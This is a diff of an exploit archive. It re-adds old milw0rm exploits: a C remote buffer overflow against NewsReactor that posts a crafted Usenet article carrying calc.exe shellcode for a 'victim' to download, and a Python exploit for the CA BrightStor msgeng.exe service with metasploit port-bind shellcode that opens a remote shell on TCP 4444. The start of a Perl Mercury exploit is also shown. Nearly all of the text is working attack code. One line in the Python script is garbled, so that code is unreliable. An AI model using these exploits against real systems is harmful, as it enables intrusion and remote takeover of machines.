-"Newsgroups: %s\r\n"
-"Subject: %s (1/1) \r\n"
-"X-Newsreader: blabla\r\n\r\n";
-
-char fileheader[]="=ybegin part=1 line=128 size=127 name="
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAA"
-"\xD6\xE6\xE3\x77" //jmp EDI in advapi32.dll XP SP2 FR.
-"\xD6\xE6\xE3\x77" //ugly but we don't know where we land...
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77"
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77" 
-"\xD6\xE6\xE3\x77"
-"AAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-"AAAAAAAA";
-
-char file[]="=ypart begin=1 end=127\r\n"  //encoded file. Doesnt matter but works!
-"vkJmyvvsxoJkJno}J..J\\74n.ncJ.Q......7474....JWJ[X]]J........J^Y]74..JWJk.....J\\XZVJ.....J\\XZ74}..J....JdJp.....\r\n";
-char fileend[]="=yend size=127 part=1 pcrc32=d4f19f0f\r\n";
-char postend[]="\r\n.\r\n";
-
-
-	memset(evilbuff,0,10000);
-	sprintf(evilbuff,header,author,author,group,subject);
-	printf("[+] Message header:\n%s",evilbuff);
-	send(nntpsock,evilbuff,strlen(evilbuff),0);
-	Sleep(100);
-
-	memset(evilbuff,0,10000);
-	memcpy(evilbuff,fileheader,strlen(fileheader));
-	memcpy(evilbuff+strlen(fileheader),calcshellcode,strlen(calcshellcode));
-	memcpy(evilbuff+strlen(fileheader)+strlen(calcshellcode),"\r\n\0",3);
-	send(nntpsock,evilbuff,strlen(evilbuff),0);
-	Sleep(100);
-
-	send(nntpsock,file,strlen(file),0);
-	Sleep(100);
-	send(nntpsock,fileend,strlen(fileend),0);
-	Sleep(100);
-	send(nntpsock,postend,strlen(postend),0);
-	Sleep(100);
-	
-	memset(recvbuff,'\0',500);
-	recv(nntpsock, recvbuff, 500, 0);
-	printf("-> %s",recvbuff);
-
-	printf("[+] Article posted. Have fun\n");
-	Sleep(1000);
-	return 0;
-}
-
-// milw0rm.com [2007-03-12]
+/*********************************************************************************
+*         NewsReactor 20070220 Article Grabbing Remote Buffer Overflow           *
+*                                Exploit 2                                       *
+*                                                                                *
+*                                                                                *
+* Check the other advisory for technical details.                                *
+*                                                                                *
+* This exploit connects to your newsgroups provider and posts a crafted article. *
+*                                                                                *
+* Ask your victim to grab it to trigger the bug and execute calc.exe.            *
+* Return address should work on XP SP2 FR.                                       *
+* Should fail on english systems cause I took the first return address I got =D. *
+* Have Fun!                                                                      *
+*                                                                                *
+* Tested against WIN XP SP2 FR                                                   *
+* Coded and Discovered by Marsu                      *
+*                                                                                *
+* Note: change evilbuff to crash News Bin Pro 4.32. 800 'A' should be enough.    *
+*********************************************************************************/
+
+
+#include "winsock2.h"
+#include "stdio.h"
+#include "stdlib.h"
+#pragma comment(lib, "ws2_32.lib")
+
+
+/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com */
+/* 0x00 0x0b 0x0c 0x0a 0x0d 0x0e 0x0f 0x09 0x20 0x22 0x7C */
+char calcshellcode[] =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x37"
+"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48"
+"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x58"
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
+"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x58"
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
+"\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x48"
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x43"
+"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x47"
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
+"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x56\x4e\x53\x4f\x35\x41\x53"
+"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
+"\x42\x35\x4a\x56\x50\x47\x4a\x4d\x44\x4e\x43\x57\x4a\x56\x4a\x59"
+"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56"
+"\x4e\x56\x43\x36\x50\x42\x45\x56\x4a\x47\x45\x36\x42\x30\x5a";
+
+int main(int argc, char* argv[])
+{
+	struct hostent *he;
+	struct sockaddr_in sock_addr;
+	WSADATA wsa;
+	int nntpsock;
+	char recvbuff[500];
+	char buffer[100];
+	char authuser[]="AUTHINFO USER %s\r\n";
+	char authpass[]="AUTHINFO PASS %s\r\n";
+	char evilbuff[10000];
+	char *user=0,*pass=0,*subject,*group,*author;
+	int i=2;
+
+	WSACleanup();
+	WSAStartup(MAKEWORD(2,0),&wsa);
+
+	if (argc<5) {
+		printf("[+] NewsReactor Article Grabbing Remote Buffer Overflow\n");
+		printf("[+] Coded and Discovered by Marsu \n");
+		printf("[+] Usage: %s Newsserver [-u User] [-p Pass] Group Subject Author\n",argv[0]);
+		printf("[+] example:\n    %s news.giganews.com -i user -p pass alt.binaries.dvdr boomboom superman\n",argv[0]);
+		return 0;
+	}
+	
+	if (strstr(argv[i],"-u")) {
+		i++;
+		user=argv[i];
+		i++;
+	}
+	if (strstr(argv[i],"-p")) {
+		i++;
+		pass=argv[i];
+		i++;
+	}
+	group=argv[i++];
+	subject=argv[i++];
+	author=argv[i];
+	
+	printf("%s \n%s \n%s \n",group,subject,author);
+	if ((he=gethostbyname(argv[1])) == NULL) { 
+		printf("Failed\n[-] Could not init gethostbyname\n");
+		return 1;
+	}
+	if ((nntpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
+		printf("Failed\n[-] Socket error\n");
+		return 1;
+	}
+
+	sock_addr.sin_family = PF_INET;
+	sock_addr.sin_port = htons(119);
+	sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
+	memset(&(sock_addr.sin_zero), '\0', 8);
+	if (connect(nntpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
+		printf("[-] Unable to connect\n");
+		return 1;
+	}
+	printf("[+] Connected to %s\n",argv[1]);
+	memset(recvbuff,'\0',500);
+	recv(nntpsock, recvbuff, 500, 0);
+	printf("-> %s",recvbuff);
+	
+	if (user!=0) {
+		memset(buffer,0,100);
+		sprintf(buffer,authuser,user);
+		send(nntpsock,buffer,strlen(buffer),0);
+		printf("[+] USER %s\n",user);
+		memset(recvbuff,'\0',500);
+		recv(nntpsock, recvbuff, 500, 0);
+		printf("-> %s",recvbuff);
+	}
+	
+	if (pass!=0) {
+		memset(buffer,0,100);
+		sprintf(buffer,authpass,pass);
+		send(nntpsock,buffer,strlen(buffer),0);
+		printf("[+] PASS %s\n",pass);
+		memset(recvbuff,'\0',500);
+		recv(nntpsock, recvbuff, 500, 0);
+		printf("-> %s",recvbuff);
+	}
+	
+	send(nntpsock,"MODE READER\r\n",strlen("MODE READER\r\n"),0);
+	printf("[+] MODE READER\n");
+	memset(recvbuff,'\0',500);
+	recv(nntpsock, recvbuff, 500, 0);
+	printf("-> %s",recvbuff);
+	
+	send(nntpsock,"POST\r\n",strlen("POST\r\n"),0);
+	printf("[+] POST\n");
+	memset(recvbuff,'\0',500);
+	recv(nntpsock, recvbuff, 500, 0);
+	printf("-> %s",recvbuff);
+	
+char header[]=
+"From: %s <%s@blabla.com>\r\n"
+"Newsgroups: %s\r\n"
+"Subject: %s (1/1) \r\n"
+"X-Newsreader: blabla\r\n\r\n";
+
+char fileheader[]="=ybegin part=1 line=128 size=127 name="
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAA"
+"\xD6\xE6\xE3\x77" //jmp EDI in advapi32.dll XP SP2 FR.
+"\xD6\xE6\xE3\x77" //ugly but we don't know where we land...
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77" 
+"\xD6\xE6\xE3\x77"
+"AAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAA";
+
+char file[]="=ypart begin=1 end=127\r\n"  //encoded file. Doesnt matter but works!
+"vkJmyvvsxoJkJno}J..J\\74n.ncJ.Q......7474....JWJ[X]]J........J^Y]74..JWJk.....J\\XZVJ.....J\\XZ74}..J....JdJp.....\r\n";
+char fileend[]="=yend size=127 part=1 pcrc32=d4f19f0f\r\n";
+char postend[]="\r\n.\r\n";
+
+
+	memset(evilbuff,0,10000);
+	sprintf(evilbuff,header,author,author,group,subject);
+	printf("[+] Message header:\n%s",evilbuff);
+	send(nntpsock,evilbuff,strlen(evilbuff),0);
+	Sleep(100);
+
+	memset(evilbuff,0,10000);
+	memcpy(evilbuff,fileheader,strlen(fileheader));
+	memcpy(evilbuff+strlen(fileheader),calcshellcode,strlen(calcshellcode));
+	memcpy(evilbuff+strlen(fileheader)+strlen(calcshellcode),"\r\n\0",3);
+	send(nntpsock,evilbuff,strlen(evilbuff),0);
+	Sleep(100);
+
+	send(nntpsock,file,strlen(file),0);
+	Sleep(100);
+	send(nntpsock,fileend,strlen(fileend),0);
+	Sleep(100);
+	send(nntpsock,postend,strlen(postend),0);
+	Sleep(100);
+	
+	memset(recvbuff,'\0',500);
+	recv(nntpsock, recvbuff, 500, 0);
+	printf("-> %s",recvbuff);
+
+	printf("[+] Article posted. Have fun\n");
+	Sleep(1000);
+	return 0;
+}
+
+// milw0rm.com [2007-03-12]
diff --git a/platforms/windows/remote/3495.txt b/platforms/windows/remote/3495.txt
index 6315bf979..ef31c2582 100755
--- a/platforms/windows/remote/3495.txt
+++ b/platforms/windows/remote/3495.txt
@@ -1,120 +1,120 @@
-#!/usr/bin/python
-# This one was listed in the SANS TOP 20 and I needed an exploit for analysis.
-# I couldnt find a reliable exploit for my analysis and so came up with this.
-# Remote exploit for the CA BrightStor msgeng.exe service stack overflow
-# vulnerability as described in LS-20060330.pdf on lssec.com. The exploit was
-# tested on windows 2000 SP4 in a VMware environment.
-# Opens a shell on TCP port 4444.
-#
-# Though a stack overflow vulnerability caused due to strcpy, this vulnerability
-# provides an interesting case. Unlike a traditional stack overflow where the
-# user supplies the overflow data which immediately is copied into a stack
-# based buffer, here the user supplied data is stored in the heap and the first
-# DWORD of the RPC stub is used as the source address in the strcpy operation.
-# This means we have to locate the address of our shellcode on the heap and then
-# craft the first DWORD of the stub in such a way that when strcpy is called our
-# buffer is the source. I had problems locating the shellcode in the heap,
-# because each time I ran the exploit the shellcode would be in different places
-# , obviously (0008xxxx or 0009xxxx or 000Axxxx). However when sending very
-# large data of around 500000 bytes I saw that along with one of the likely
-# locations it was always available at the address 011E0070 aswell. Atleast on
-# the setup I have for analysis this address does not have anything useful if
-# buffer sizes of 1k, 2k etc are used. Once we get the address straight, there
-# after its a straight forward stack overflow that can overwrite EIP.
-#
-# This exploit binds shell to TCP port 4444 and connects to it
-#
-# Author shall bear no responsibility for any screw ups caused by using the code
-# Winny M Thomas ;-)
-
-from impacket.dcerpc import transport, dcerpc
-from impacket import uuid
-import struct
-import time
-import sys
-import os
-
-#alphanumeric portbind shellcode from metasploit. Binds shell to port 4444
-shellcode  = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
-shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
-shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57"
-shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38"
-shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58"
-shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48"
-shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54"
-shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
-shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d"
-shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38"
-shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56"
-shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
-shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57"
-shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
-shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e"
-shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30"
-shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
-shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34"
-shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41"
-shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a"
-shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
-shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
-shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
-shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d"
-shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56"
-shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
-shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46"
-shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c"
-shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c"
-shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32"
-shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
-shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
-shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36"
-shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
-shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56"
-shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
-shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
-shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
-shellcode += "\x4f\x4f\x42\x4d\x5a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-
-def DCEconnectAndExploit(target):
-       trans = transport.TCPTransport(target, 6503)
-       trans.connect()
-       dce = dcerpc.DCERPC_v5(trans)
-       dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
-
-       # The following DWORD gets converted to an address pointing into our
-       # buffer.
-       request = struct.pack('\n' % sys.argv[0]
-               sys.exit(-1)
-
-       DCEconnectAndExploit(target)
-       print 'Exploit sent to: %s' % target
-       print 'Connecting to %s:4444' % target
-       time.sleep(3)
-       ConnectRemoteShell(target)
-
-# milw0rm.com [2007-03-16]
+#!/usr/bin/python
+# This one was listed in the SANS TOP 20 and I needed an exploit for analysis.
+# I couldnt find a reliable exploit for my analysis and so came up with this.
+# Remote exploit for the CA BrightStor msgeng.exe service stack overflow
+# vulnerability as described in LS-20060330.pdf on lssec.com. The exploit was
+# tested on windows 2000 SP4 in a VMware environment.
+# Opens a shell on TCP port 4444.
+#
+# Though a stack overflow vulnerability caused due to strcpy, this vulnerability
+# provides an interesting case. Unlike a traditional stack overflow where the
+# user supplies the overflow data which immediately is copied into a stack
+# based buffer, here the user supplied data is stored in the heap and the first
+# DWORD of the RPC stub is used as the source address in the strcpy operation.
+# This means we have to locate the address of our shellcode on the heap and then
+# craft the first DWORD of the stub in such a way that when strcpy is called our
+# buffer is the source. I had problems locating the shellcode in the heap,
+# because each time I ran the exploit the shellcode would be in different places
+# , obviously (0008xxxx or 0009xxxx or 000Axxxx). However when sending very
+# large data of around 500000 bytes I saw that along with one of the likely
+# locations it was always available at the address 011E0070 aswell. Atleast on
+# the setup I have for analysis this address does not have anything useful if
+# buffer sizes of 1k, 2k etc are used. Once we get the address straight, there
+# after its a straight forward stack overflow that can overwrite EIP.
+#
+# This exploit binds shell to TCP port 4444 and connects to it
+#
+# Author shall bear no responsibility for any screw ups caused by using the code
+# Winny M Thomas ;-)
+
+from impacket.dcerpc import transport, dcerpc
+from impacket import uuid
+import struct
+import time
+import sys
+import os
+
+#alphanumeric portbind shellcode from metasploit. Binds shell to port 4444
+shellcode  = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
+shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
+shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57"
+shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38"
+shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58"
+shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48"
+shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54"
+shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
+shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d"
+shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38"
+shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56"
+shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
+shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57"
+shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
+shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e"
+shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30"
+shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
+shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34"
+shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41"
+shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a"
+shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
+shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
+shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
+shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d"
+shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56"
+shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
+shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46"
+shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c"
+shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c"
+shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32"
+shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
+shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
+shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36"
+shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
+shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56"
+shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
+shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
+shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
+shellcode += "\x4f\x4f\x42\x4d\x5a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+
+def DCEconnectAndExploit(target):
+       trans = transport.TCPTransport(target, 6503)
+       trans.connect()
+       dce = dcerpc.DCERPC_v5(trans)
+       dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
+
+       # The following DWORD gets converted to an address pointing into our
+       # buffer.
+       request = struct.pack('\n' % sys.argv[0]
+               sys.exit(-1)
+
+       DCEconnectAndExploit(target)
+       print 'Exploit sent to: %s' % target
+       print 'Connecting to %s:4444' % target
+       time.sleep(3)
+       ConnectRemoteShell(target)
+
+# milw0rm.com [2007-03-16]
diff --git a/platforms/windows/remote/3561.pl b/platforms/windows/remote/3561.pl
index 0ff6ab7f8..1e22b135f 100755
--- a/platforms/windows/remote/3561.pl
+++ b/platforms/windows/remote/3561.pl
@@ -1,117 +1,117 @@
-#!/usr/bin/perl
-# 
-# http://www.securityfocus.com/bid/11775
-# credit to Muts for this vulnerability
-# acaro [at] jervus.it
-
-
-use IO::Socket::INET;
-use Switch;
-
-if (@ARGV < 3) {
-print "--------------------------------------------------------------------\n";
-print "Usage : mercury-4444-multi.pl -hTargetIPAddress -oAssemblyinstructions\n";
-print " Return address: \n";
-print " 1 - Windows 2k Sp4 English Version\n";
